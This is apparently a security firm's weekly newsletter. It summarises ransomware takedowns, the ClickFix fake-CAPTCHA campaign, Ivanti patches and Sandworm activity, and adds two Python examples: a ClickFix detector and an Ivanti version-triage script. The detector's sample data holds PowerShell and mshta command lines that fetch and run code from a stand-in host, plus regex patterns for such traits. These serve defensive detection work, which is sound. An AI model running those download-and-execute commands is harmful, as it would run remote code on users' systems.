Hello there 👋
Welcome back to the Kraven Security weekly newsletter, triaging the week. We round up the week’s top news stories, highlight our featured article, give you some learning resources, and finish with a few personal notes about what’s happening at the company. Enjoy!
Top 5 News Stories

Global Law Enforcement Seizes 8Base Ransomware Data Leak Sites in Major Crackdown
A global law enforcement operation, “Phobos Aetor,” has dismantled 8Base ransomware’s dark web sites and arrested four suspects linked to Phobos ransomware in Thailand. The takedown involved agencies from 11 countries, marking a significant blow to the gang responsible for over $16M in cyber extortion.
Key takeaways:
🚨 Operation Success: “Phobos Aetor” led to the seizure of 8Base’s data leak and negotiation sites.
👮 Arrests: Four European suspects (two men and two women) were apprehended in Phuket, Thailand.
🌍 Global Effort: Involved agencies from the UK, US, Japan, and eight other nations, coordinated by Europol.
💰 Extortion Scale: The gang allegedly earned $16M, targeting over 1,000 victims worldwide, including 17 Swiss companies.
🔍 Evidence Seizure: Laptops, smartphones, and crypto wallets were confiscated for forensic analysis.
Cybercriminals Use ClickFix Technique to Deploy NetSupport RAT
Cyber attackers are abusing the ClickFix method to distribute NetSupport RAT by tricking users with fake CAPTCHA pages into executing PowerShell commands. This malware gives attackers full control over compromised systems, highlighting the need for vigilance against deceptive browser prompts.
Key takeaways:
⚠️ Exploitation Method: Threat actors use ClickFix, a social engineering tactic, to deploy NetSupport RAT.
🔗 Fake CAPTCHA: Malicious websites masquerade as CAPTCHA checks and instruct the visitor to "verify" by pasting a clipboard-loaded PowerShell command into the Windows Run dialog, so the victim launches the malware themselves.
🖥️ Malware Capabilities: NetSupport RAT is the commercial NetSupport Manager remote-administration tool repurposed as malware; it lets attackers remotely control devices, including screen monitoring and file manipulation.
🔍 Prevalence: Over 6,000 WordPress sites have been compromised in recent ClickFix campaigns.
🛡️ Security Advice: Users should be cautious of unexpected browser updates or CAPTCHA prompts and ensure they’re on legitimate sites.
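Because the ClickFix lure makes the victim launch the payload from the Run dialog, the resulting process tree is distinctive: a console or script host spawned directly by explorer.exe with a command line that reaches out to the network, hides its window, or carries an encoded command, and a matching entry left in the user's RunMRU registry key. The following detection logic is an added example written for this newsletter, not code from the reporting it summarises; the event records and registry values are constructed for the example, and the field names follow Sysmon Event ID 1 conventions.

```python
"""Flag ClickFix-style executions from process-creation telemetry and RunMRU data.

Constructed sample data only; no real telemetry is embedded here.
"""
import re

# Constructed Sysmon Event ID 1 style records, trimmed to the fields the logic needs.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell -w hidden -c "iex (iwr -useb http://example.invalid/captcha.txt)"'},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "mshta http://example.invalid/verify.hta"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"powershell -File C:\scripts\backup.ps1"},   # admin script, not from explorer
    {"Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "notepad.exe"},                                # benign Run-dialog launch
]

# Binaries a Run-dialog ClickFix payload typically hands off to.
LOLBINS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "curl.exe", "certutil.exe"}

# Traits commonly seen in ClickFix command lines: remote fetch, hidden window,
# base64 -EncodedCommand, download-and-execute cmdlets.
SUSPICIOUS = [
    re.compile(r"https?://", re.I),
    re.compile(r"(?:^|\s)-w(?:in|indowstyle)?\s+hidden\b", re.I),
    re.compile(r"(?:^|\s)-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    re.compile(r"\b(?:iex|invoke-expression|iwr|invoke-webrequest|downloadstring)\b", re.I),
]


def basename(path: str) -> str:
    """Last path component, lower-cased, tolerant of either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def clickfix_indicators(event: dict) -> list:
    """Return the suspicious patterns matched by an explorer.exe-spawned LOLBin, or [] if clean."""
    if basename(event.get("ParentImage", "")) != "explorer.exe":
        return []
    if basename(event.get("Image", "")) not in LOLBINS:
        return []
    cmd = event.get("CommandLine", "")
    return [p.pattern for p in SUSPICIOUS if p.search(cmd)]


def scan(events: list) -> list:
    """(command line, matched patterns) for every event that looks like a ClickFix launch."""
    flagged = []
    for event in events:
        hits = clickfix_indicators(event)
        if hits:
            flagged.append((event["CommandLine"], hits))
    return flagged


# Explorer records each Run-dialog entry under this key; values end with a literal "\1".
RUNMRU_KEY = r"HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"

# Constructed export of that key (as 'reg query' would list the values).
SAMPLE_RUNMRU = {
    "a": "notepad\\1",
    "b": 'powershell -w hidden -c "iex (iwr -useb http://example.invalid/fix.txt)"\\1',
    "MRUList": "ba",
}


def suspicious_runmru(values: dict) -> list:
    """Run-dialog history entries whose command matches a ClickFix trait."""
    out = []
    for name, data in values.items():
        if name == "MRUList":
            continue
        entry = data[:-2] if data.endswith("\\1") else data
        if any(p.search(entry) for p in SUSPICIOUS):
            out.append(entry)
    return out


if __name__ == "__main__":
    for cmd, hits in scan(SAMPLE_EVENTS):
        print(f"[process] {cmd}\n          matched: {hits}")
    for entry in suspicious_runmru(SAMPLE_RUNMRU):
        print(f"[RunMRU ] {entry}")
```

The parent-is-explorer.exe condition is what separates a user pasting into Win+R from scheduled tasks, RMM agents, or an admin's own shell, so keep it even if you broaden the pattern list; without it the network-fetch patterns alone will be noisy on any fleet that runs PowerShell deployment scripts.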
US Sanctions LockBit Ransomware’s Bulletproof Hosting Provider
The US, the UK, and Australia have sanctioned Zservers, a Russian bulletproof hosting provider accused of facilitating LockBit ransomware attacks. This move targets the infrastructure supporting one of the world’s most notorious ransomware groups.
Key takeaways:
🧑‍⚖️ Sanctions Imposed: The U.S. Treasury Department has sanctioned Zservers for supporting LockBit.
👥 Individuals Named: Alexander Igorevich Mishin and Aleksandr Sergeyevich Bolshakov, both from Russia, were identified as key figures behind Zservers.
🌐 International Effort: Sanctions are part of a broader AUKUS alliance action against cybercrime.
🕵️ Evidence of Use: Zservers’ infrastructure has been linked to LockBit since at least 2022, with servers used for ransomware operations.
🔒 Impact on Cybercrime: This sanction aims to disrupt the bulletproof hosting services that cybercriminals rely on for anonymity and persistence.
BadPilot Network Hacking Fuels Russian Sandworm’s Global Cyber Attacks
Microsoft has uncovered BadPilot, a multi-year initial-access campaign run by a subgroup of the notorious Russian Sandworm hacking group (tracked by Microsoft as Seashell Blizzard), which exploits eight security flaws in internet-facing systems to infiltrate critical sectors worldwide, including energy and telecommunications.
Key takeaways:
😈 Russian Cyber Threat: BadPilot is run by an initial-access subgroup of Sandworm (also known as APT44 and Seashell Blizzard), which hands footholds on to the wider group for espionage and disruptive operations.
🔓 Exploited Vulnerabilities: Eight different security flaws are used to gain initial access to networks globally.
🌐 Global Targets: The campaign targets critical infrastructure in over 15 countries, focusing on energy, oil and gas, and government entities.
🕵️ Persistent Access: The aim is to maintain long-term access for espionage and potential future attacks.
⚠️ Urgent Need for Vigilance: Organizations are advised to patch known vulnerabilities and strengthen network defenses.
Ivanti Patches Three Critical Vulnerabilities in Connect Secure and Policy Secure
Ivanti has urgently patched three critical vulnerabilities in its Connect Secure, Policy Secure, and Secure Access Client products. Immediate updates are recommended to prevent remote code execution and other severe security breaches.
Key takeaways:
🔒 Critical Patches: Ivanti has fixed three critical-severity issues, including a stack-based buffer overflow in Connect Secure that lets an authenticated remote attacker achieve remote code execution (CVE-2025-22467).
🚨 No Mitigations: No workarounds are available; the only solution is to apply the latest software updates.
📅 Update Details: Patches are available for ICS version 22.7R2.6, IPS version 22.7R1.3, and ISAC version 22.8R1.
🔍 Discovery: Flaws were identified through Ivanti’s responsible disclosure program and external security researchers.
⚠️ Support Limitation: Ivanti will not fix the older Pulse Connect Secure 9.x line, as support has ended.
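With no workaround on offer, the only question for an operator is whether each appliance build is at or above the fixed release. Ivanti version strings use a major.minor R release . patch scheme (for example 22.7R2.5), which plain string comparison gets wrong, so the helper below parses them before comparing. This is an added example written for this newsletter, not Ivanti tooling; the fixed versions are the ones from the advisory summarised above, the product keys (ICS, IPS, ISAC), function names and the sample inventory are this example's own assumptions.

```python
"""Triage an inventory of Ivanti ICS / IPS / ISAC builds against the February 2025 fixed releases.

Fixed versions from the advisory; product labels and the inventory below are constructed.
"""
import re

FIXED = {
    "ICS": "22.7R2.6",   # Connect Secure
    "IPS": "22.7R1.3",   # Policy Secure
    "ISAC": "22.8R1",    # Secure Access Client
}

# The 9.x Pulse Connect Secure line is end of support; no fix will ship for it.
UNSUPPORTED_MAJOR = 9

_VERSION = re.compile(r"^(\d+)\.(\d+)R(\d+)(?:\.(\d+))?$")


def parse_version(text: str) -> tuple:
    """'22.7R2.6' -> (22, 7, 2, 6); a missing patch component counts as 0."""
    m = _VERSION.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised Ivanti version string: {text!r}")
    major, minor, release, patch = m.groups()
    return (int(major), int(minor), int(release), int(patch or 0))


def assess(product: str, version: str) -> str:
    """Return 'patched', 'vulnerable' or 'unsupported' for one product build."""
    build = parse_version(version)
    if build[0] <= UNSUPPORTED_MAJOR:
        return "unsupported"
    return "patched" if build >= parse_version(FIXED[product]) else "vulnerable"


def triage(inventory: list) -> dict:
    """Group hostnames by status so the vulnerable and unsupported sets are immediately visible."""
    groups = {"patched": [], "vulnerable": [], "unsupported": []}
    for host, product, version in inventory:
        groups[assess(product, version)].append(host)
    return groups


# Constructed inventory: (hostname, product, running version).
SAMPLE_INVENTORY = [
    ("vpn-hq-01", "ICS", "22.7R2.6"),
    ("vpn-hq-02", "ICS", "22.7R2.5"),
    ("vpn-legacy", "ICS", "9.1R18.9"),
    ("nac-01", "IPS", "22.7R1.2"),
    ("laptop-build", "ISAC", "22.8R1"),
]

if __name__ == "__main__":
    for status, hosts in triage(SAMPLE_INVENTORY).items():
        print(f"{status:12s} {', '.join(hosts) or '-'}")
```

Feed it the version column from your asset inventory or from the appliance admin UI; anything in the unsupported bucket needs a migration plan rather than a patch window, since Ivanti has said the 9.x line will not be fixed.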
Top Tips of the Week

Threat Intelligence
- Document your CTI processes thoroughly. Clear documentation aids in understanding, dissemination, and continuous improvement.
- Monitor the deep and dark web for chatter. Proactively identify discussions related to your organization for early threat detection.
Threat Hunting
- Share findings with the community. Collective insights strengthen everyone’s ability to respond to threats.
- Implement a feedback loop in cyber threat hunting. Gather insights from team members and stakeholders to continually improve processes.
- Stay agile. The threat landscape evolves; so should your threat hunting strategy. Adaptability is key to effective cybersecurity.
Custom Tooling
- Consider the user’s perspective in custom tool design. Prioritize features and functionalities based on user needs and preferences.
- Encourage collaboration between developers and end-users in custom tool design. Align functionality with user needs and expectations.
Feature Article

Cyber threat intelligence can be a game-changer for most organizations. It enables them to proactively manage the risks they face when conducting business in the cyber domain. But what does this look like? What key roles and responsibilities does a CTI team have?
This guide answers these questions by explaining how a CTI team fits into the larger business and the key roles within a CTI team that are required to fulfill its mission. This includes general roles, like CTI manager and analyst, and specialized roles, such as CTI engineer, threat hunter, and dark web researcher.
Each role is pivotal in ensuring the CTI team can collect, analyze, and share threat intelligence that informs key business decisions. That’s why this guide also showcases how these roles work together by breaking the CTI process into the OODA loop, CTI lifecycle, and F3EAD loop.
Let’s get started exploring what you need to build a great CTI team!
Learning Resources

UK Demands Apple Create Backdoor
Backdoors are bad. Period. But that hasn’t stopped the UK government from secretly making a demand for Apple to create a backdoor to access encrypted iCloud data worldwide, citing the Investigatory Powers Act of 2016.
This law grants MI5 and MI6 extensive surveillance capabilities, making it illegal for Apple to disclose the request. The move raises serious concerns for global privacy, as it could set a precedent for undermining end-to-end encryption used by services like Signal and WhatsApp.
This entertaining video describes the situation and advocates some measures you can take to protect yourself!
New Free Malware Research Tool Drops
Group-IB has just released a powerful, free malware research tool that requires no sign-up. The tool allows users to analyze malware by searching for file names, hashes, or artifacts and provides detailed reports, including process tracking, file modifications, and network activity.
This great video from Gary Ruddell showcases how you can explore malware behaviors through a visual graph, view MITRE ATT&CK techniques used, and access credentials stored within infections.
An awesome tool to help investigators quickly assess threats and identify malicious activities in their environments.
Ransomware Tools, Techniques, and Strategies
Discover the tools, techniques, and strategies used by cybercriminals to conduct ransomware operations in this insightful presentation from Will Thomas.
He explains how ransomware gangs leverage step-by-step guides, common vulnerabilities, and templated attacks to exploit organizations worldwide. He then explores how defenders can counter these threats by understanding attacker methodologies, blocking commonly used tools, and leveraging threat intelligence for proactive defense.
A must-watch for anyone wanting to learn how to better combat ransomware!
Understanding Adversary Intent
This great presentation from the legendary Robert M. Lee explores the complexities of understanding adversary intent in cybersecurity, emphasizing the challenges of attribution and intelligence gathering.
He highlights biases in data collection, the difficulty of assessing an attacker’s true objectives, and how these uncertainties can impact decision-making. Using real-world case studies, including cyberattacks on power grids and industrial control systems, the talk underscores how attribution can sometimes mislead security teams rather than help them.
Rob encourages cybersecurity professionals to refine their threat models based on observed behavior rather than assumptions about attacker motives.